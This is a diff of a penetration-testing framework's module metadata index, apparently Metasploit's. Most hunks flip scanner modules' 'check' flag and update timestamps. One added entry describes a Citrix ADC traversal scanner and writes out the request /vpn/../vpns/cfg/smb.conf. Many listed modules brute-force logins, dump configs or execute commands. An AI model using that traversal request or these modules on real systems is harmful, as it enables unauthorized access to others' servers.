    "default_credential": false,
    "notes": {
@@ -19585,7 +19716,7 @@
    "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/empty_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19659,7 +19790,7 @@
    "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/ipv6_neighbor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19734,7 +19865,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_probe",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19771,7 +19902,7 @@
    "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
    "is_install_path": true,
    "ref_name": "scanner/discovery/udp_sweep",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19849,7 +19980,7 @@
    "path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/dns/dns_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19895,7 +20026,7 @@
    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19932,7 +20063,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_devicemanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -19969,7 +20100,7 @@
    "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
    "is_install_path": true,
    "ref_name": "scanner/emc/alphastor_librarymanager",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20017,7 +20148,7 @@
    "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/open_key_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20065,7 +20196,7 @@
    "path": "/modules/auxiliary/scanner/etcd/version.rb",
    "is_install_path": true,
    "ref_name": "scanner/etcd/version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20102,7 +20233,7 @@
    "path": "/modules/auxiliary/scanner/finger/finger_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/finger/finger_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20140,7 +20271,7 @@
    "path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/anonymous",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20298,7 +20429,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20336,7 +20467,7 @@
    "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/ftp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20461,7 +20592,7 @@
    "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/ftp/titanftp_xcrc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20498,7 +20629,7 @@
    "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
    "is_install_path": true,
    "ref_name": "scanner/gopher/gopher_gophermap",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20537,7 +20668,7 @@
    "path": "/modules/auxiliary/scanner/gprs/gtp_echo.rb",
    "is_install_path": true,
    "ref_name": "scanner/gprs/gtp_echo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20574,7 +20705,7 @@
    "path": "/modules/auxiliary/scanner/h323/h323_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/h323/h323_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20622,7 +20753,7 @@
    "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/a10networks_ax_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20669,7 +20800,7 @@
    "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/accellion_fta_statecode_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20719,7 +20850,7 @@
    "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/adobe_xml_inject",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20765,7 +20896,7 @@
    "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/advantech_webaccess_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -20865,7 +20996,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -20914,7 +21045,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_activemq_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21020,7 +21151,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_optionsbleed",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21071,7 +21202,7 @@
    "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_userdir_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21118,7 +21249,7 @@
    "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/appletv_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21172,7 +21303,7 @@
    "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/atlassian_crowd_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21219,7 +21350,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_local_file_include",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21266,7 +21397,7 @@
    "path": "/modules/auxiliary/scanner/http/axis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/axis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21312,7 +21443,7 @@
    "path": "/modules/auxiliary/scanner/http/backup_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/backup_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21360,7 +21491,7 @@
    "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/barracuda_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21406,7 +21537,7 @@
    "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bavision_cam_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21452,7 +21583,7 @@
    "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/binom3_login_config_pass_dump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21503,7 +21634,7 @@
    "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bitweaver_overlay_type_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21549,7 +21680,7 @@
    "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/blind_sql_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21639,11 +21770,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-21 16:45:42 +0000",
    "path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/brute_dirs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21689,7 +21820,7 @@
    "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buffalo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21735,7 +21866,7 @@
    "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/buildmaster_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21785,7 +21916,7 @@
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -21833,7 +21964,7 @@
    "path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/canon_wireless",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21870,7 +22001,7 @@
    "path": "/modules/auxiliary/scanner/http/cert.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cert",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21919,7 +22050,7 @@
    "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cgit_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -21965,7 +22096,7 @@
    "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chef_webui_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22011,7 +22142,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_webserver",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22057,7 +22188,7 @@
    "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/chromecast_wifi",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22103,7 +22234,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_asa_asdm",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22151,7 +22282,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_device_manager",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22248,7 +22379,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_download",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22294,7 +22425,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_firepower_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22343,7 +22474,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ios_auth_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22389,7 +22520,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ironport_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -22436,7 +22567,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_nac_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22482,7 +22613,7 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22531,13 +22662,64 @@
    "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/citrix_dir_traversal": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal Scanner",
+    "fullname": "auxiliary/scanner/http/citrix_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-17",
+    "type": "auxiliary",
+    "author": [
+      "Erik Wynter",
+      "altonjx"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
+    "references": [
+      "CVE-2019-19781",
+      "URL-https://support.citrix.com/article/CTX267027/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-14 00:25:18 +0000",
+    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/citrix_dir_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/clansphere_traversal": {
    "name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
    "fullname": "auxiliary/scanner/http/clansphere_traversal",
@@ -22579,7 +22761,7 @@
    "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/clansphere_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22626,7 +22808,7 @@
    "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/cnpilot_r_web_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22677,7 +22859,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_locale_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22724,7 +22906,7 @@
    "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/coldfusion_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22772,7 +22954,7 @@
    "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/concrete5_member_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22818,7 +23000,7 @@
    "path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/copy_of_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -22911,7 +23093,7 @@
    "path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dell_idrac",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -22958,7 +23140,7 @@
    "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dicoogle_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23000,11 +23182,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
    "path": "/modules/auxiliary/scanner/http/dir_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_listing",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23046,11 +23228,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
    "path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23100,7 +23282,7 @@
    "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23146,7 +23328,7 @@
    "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/directadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23193,7 +23375,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_300_615_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23240,7 +23422,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_615h_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23287,7 +23469,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23335,7 +23517,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_user_agent_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23384,7 +23566,7 @@
    "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dnalims_file_retrieve",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23430,7 +23612,7 @@
    "path": "/modules/auxiliary/scanner/http/docker_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/docker_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23476,7 +23658,7 @@
    "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dolibarr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23570,7 +23752,7 @@
    "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ektron_cms400net",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23702,7 +23884,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_config",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23749,7 +23931,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23796,7 +23978,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23843,7 +24025,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_ping_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23890,7 +24072,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_reset_pass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23936,7 +24118,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23982,7 +24164,7 @@
    "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/error_sql_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24034,7 +24216,7 @@
    "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/es_file_explorer_open_port",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24080,7 +24262,7 @@
    "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/etherpad_duo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24176,7 +24358,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_bigip_virtual_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24224,7 +24406,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_mgmt_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24270,7 +24452,7 @@
    "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/file_same_name_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24316,7 +24498,7 @@
    "path": "/modules/auxiliary/scanner/http/files_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/files_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24362,7 +24544,7 @@
    "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/fortinet_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24411,7 +24593,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_credential_dump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24458,7 +24640,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24504,7 +24686,7 @@
    "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gavazzi_em_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24551,7 +24733,7 @@
    "path": "/modules/auxiliary/scanner/http/git_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/git_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24597,7 +24779,7 @@
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24643,7 +24825,7 @@
    "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24691,7 +24873,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24740,7 +24922,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24788,7 +24970,7 @@
    "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/goahead_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24838,7 +25020,7 @@
    "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/groupwise_agents_http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24882,11 +25064,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-22 15:09:08 +0000",
    "path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/host_header_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24936,7 +25118,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24986,7 +25168,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25036,7 +25218,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25086,7 +25268,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25136,7 +25318,7 @@
